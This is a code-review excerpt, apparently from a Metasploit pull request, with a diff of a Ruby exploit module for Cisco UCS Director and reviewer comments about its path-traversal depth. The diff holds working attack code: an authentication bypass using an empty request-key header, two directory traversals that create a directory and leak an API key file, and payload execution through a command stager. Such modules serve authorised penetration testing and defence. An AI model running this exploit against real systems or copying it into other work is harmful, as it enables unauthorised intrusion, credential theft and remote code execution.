modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb

```diff
@@ -0,0 +1,307 @@
+    end
+
+    CheckCode::Detected('Target is running Cisco UCS Director.')
+  end
+
+  def exploit
+    unless datastore['LEAK_FILE'].start_with?('/')
+      fail_with(Failure::BadConfig, 'LEAK_FILE is not an absolute path')
+    end
+
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    # Randomly named file is never written to the exports directory
+    create_exports_dir(
+      '/opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports',
+      rand_text_alphanumeric(8..42)
+    )
+
+    if (@api_key = datastore['API_KEY'])
+      print_status("User-specified API key: #{@api_key}")
+    else
+      leak_api_key(datastore['LEAK_FILE'])
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_command
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def create_exports_dir(*path_parts)
+    path = normalize_uri(path_parts)
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(
+      Faker::Hacker.say_something_smart, # data
+      'text/plain', # content_type
+      nil, # transfer_encoding
+      %(form-data; name="#{rand_text_alphanumeric(8..42)}"; ) +
+        # Directory traversal #1
+        %(filename="../../../..#{path}") # content_disposition
+    )
+
+    print_status('Creating exports directory')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cloupia/api/rest'),
+      'headers' => {
+        'X-Cloupia-Request-Key' => '' # Auth bypass
+      },
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'vars_get' => {
+        'opName' => 'userAPI:userAPIUnifiedImport',
+        'opData' => '{}'
+      },
+      'data' => mime.to_s
+    )
+
+    unless res
+      fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
+    end
+
+    # It will always return 200, even on error
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
+    end
+
+    # It will always return this error, despite creating the directory!
+    unless res.body.include?('Cannot execute operation')
+      fail_with(Failure::NotVulnerable, 'Could not create exports directory')
+    end
+
+    print_good('Successfully created exports directory')
+  end
+
+  def leak_api_key(*path_parts)
+    path = normalize_uri(path_parts)
+
+    print_status("Leaking API key from #{path}")
+
+    # TODO: Chunk this!
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/cloupia/api/rest'),
+      'headers' => {
+        'X-Cloupia-Request-Key' => '' # Auth bypass
+      },
+      'vars_get' => {
+        'opName' => 'userAPI:userAPIDownloadFile',
+        'opData' => {
+          # Directory traversal #2
+          'param0' => "../../../../../../../..#{path}"
```

Comment:
I'm curious about the significance of the number of `../`s here, I might have missed it but I couldn't see a reason given in the references you listed

Reply:
Sure, I should document where the traversals start.

Reply:
```
wvu@kharak:~$ realpath -m /opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports/../../../../../../../../foo/bar
/foo/bar
wvu@kharak:~$
```

Reply:
```
/*  407 */     String filePath = "/opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports/" + fileName;  // 3
```